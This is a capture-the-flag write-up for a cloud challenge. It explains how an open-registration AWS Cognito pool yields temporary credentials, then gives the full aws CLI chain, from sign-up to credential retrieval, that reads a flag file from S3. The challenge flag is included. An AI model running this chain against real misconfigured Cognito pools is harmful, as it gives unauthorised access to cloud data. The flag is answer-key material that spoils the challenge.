Make It Rain
We built secure vault to store our secret flag but somehow got the blueprint of the vault leaked.Can you help us to retrieve the secret flag from the vault?
5/10
PCTF{G14d_th4T_y0u_tR13d!}
None
__iAmPradeep
Biplav
The goal of this challenge is to access a file (flag.txt) stored in an Amazon S3 bucket by authenticating via Cognito, retrieve temporary AWS credentials, and use the credentials to read the flag from S3.
The misconfiguration is due to default public registration policy. It allows anyone to register to the Cognito user pool. That allows temporary credentials to the pool which allows access to the restricted resources.
aws cognito-idp sign-up --client-id 4bjmgsip08ah118ugkau5p946b --username masoncc --password 'MasonCC' --user-attributes Name="email",Value="[email protected]" --region us-east-1
aws cognito-idp confirm-sign-up --client-id 4bjmgsip08ah118ugkau5p946b --username masoncc --confirmation-code 133713 --region us-east-1
aws cognito-idp initiate-auth --region us-east-1 --auth-flow USER_PASSWORD_AUTH --client-id 4bjmgsip08ah118ugkau5p946b --auth-parameters USERNAME=masoncc,PASSWORD=MasonCC
4.aws cognito-identity get-id --identity-pool-id "us-east-1:b73a3094-c689-47e2-b9c4-311d5b7ee1ee" --region "us-east-1" --logins cognito-idp.us-east-1.amazonaws.com/us-east-1_uSid13Z6L=id-token-output-value-from-previous-step
aws cognito-identity get-credentials-for-identity --identity-id identity-id-output-value-from-last-step --logins cognito-idp.us-east-1.amazonaws.com/us-east-1_uSid13Z6L=id-token-output-value-from-step-3
export AWS_ACCESS_KEY_ID=
export AWS_SESSION_TOKEN=
export AWS_SECRET_ACCESS_KEY=
aws s3 cp s3://patriot-ctf-cloud-ctf-challenge/flag.txt -
PCTF{G14d_th4T_y0u_tR13d!}